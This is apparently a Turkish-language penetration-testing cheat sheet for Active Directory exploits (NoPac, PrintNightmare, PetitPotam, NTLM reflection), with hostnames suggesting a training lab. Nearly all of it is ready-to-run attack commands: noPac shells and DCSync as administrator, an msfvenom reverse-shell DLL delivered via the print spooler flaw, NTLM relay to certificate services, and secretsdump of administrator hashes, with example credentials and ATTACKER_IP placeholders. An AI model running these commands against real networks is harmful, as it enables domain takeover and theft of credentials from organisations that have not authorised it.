Bleeding Edge Vulns

NoPac (CVE-2021-42278 ve CVE-2021-42287)

• DC üzerinde antivirüs var ise çalışmaz

• Kasım 2021 güncellemesi almayan DC üzerinde çalışır

• Domain kullanıcısı gerekir

# NXC Kontrol
nxc smb 172.16.5.5 -u 'john' -p 'pass123' -M nopac

# Kontrol
python scanner.py example.local/john:pass123-dc-ip 172.16.5.5 -use-ldap

# Shell
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

# DCsync
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user example/administrator

PrintNightmare (CVE-2021-34527 ve CVE-2021-1675)

• Temmuz 2021 öncesi windows sürümlerinde görülür.

• Printspooler servisi açık olmalı.

• Domain kullanıcısı gerekir

# NXC Kontrol
nxc smb 172.16.5.5 -u '' -p '' -M printnightmare

# Printspooler servisi kontrolü
impacket-rpcdump @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

# Reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll
impacket-smbserver -smb2support CompData .

# Exploit
python CVE-2021-1675.py example.local/john:'pass123'@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

PetitPotam (CVE-2021-36942)

• Ağustos 2021

• Domain kullanıcısı gerekmez

nxc smb 172.16.5.225 -u '' -p '' -M coerce_plus -o METHOD=PetitPotam

impacket-ntlmrelayx -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

python PetitPotam.py 172.16.5.225 172.16.5.5

python PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGS dc01.ccache
export KRB5CCNAME=dc01.ccache
impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL


python PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes :313b6f423cd1ee07e91315b4919fb4ba

NTLM Reflection

# SMB Signing kapalı olmalı
nxc smb <SUBNET>

# DNS Kaydımızı Ekliyoruz
python dnstool.py -u 'domain.local\john' -p 'pass123' -force-ssl --forest -port 636 -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <ATTACKER_IP> <DC_IP>
# Kayıt kontrolu
python dnstool.py -u 'domain.local\john' -p 'pass123' -force-ssl --forest -port 636 -a query -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' <DC_IP>

impacket-ntlmrelayx -t <TARGET_IP> -smb2support
python PetitPotam.py -u john -p pass123 -d domain.local localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <TARGET_HOSTNAME>